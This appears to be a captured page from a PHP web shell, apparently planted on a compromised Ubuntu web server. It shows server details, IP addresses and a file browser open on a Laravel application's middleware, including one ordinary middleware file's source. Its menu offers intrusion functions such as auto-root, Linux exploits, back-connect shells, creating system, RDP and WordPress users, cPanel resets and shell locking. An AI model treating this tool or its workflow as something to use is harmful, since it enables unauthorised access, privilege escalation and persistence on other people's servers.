Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.189
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
honeycomb /
src /
app /
Http /
Middleware /
[ HOME SHELL ]
Name
Size
Permission
Action
Authenticate.php
469
B
-rwxrwxr-x
EncryptCookies.php
294
B
-rwxrwxr-x
PreventRequestsDuringMaintenan...
353
B
-rwxrwxr-x
RedirectIfAuthenticated.php
734
B
-rwxrwxr-x
TrimStrings.php
368
B
-rwxrwxr-x
TrustHosts.php
354
B
-rwxrwxr-x
TrustProxies.php
636
B
-rwxrwxr-x
VerifyCsrfToken.php
307
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RedirectIfAuthenticated.php
<?php namespace App\Http\Middleware; use App\Providers\RouteServiceProvider; use Closure; use Illuminate\Http\Request; use Illuminate\Support\Facades\Auth; class RedirectIfAuthenticated { /** * Handle an incoming request. * * @param \Illuminate\Http\Request $request * @param \Closure $next * @param string|null ...$guards * @return mixed */ public function handle(Request $request, Closure $next, ...$guards) { $guards = empty($guards) ? [null] : $guards; foreach ($guards as $guard) { if (Auth::guard($guard)->check()) { return redirect(RouteServiceProvider::HOME); } } return $next($request); } }
Close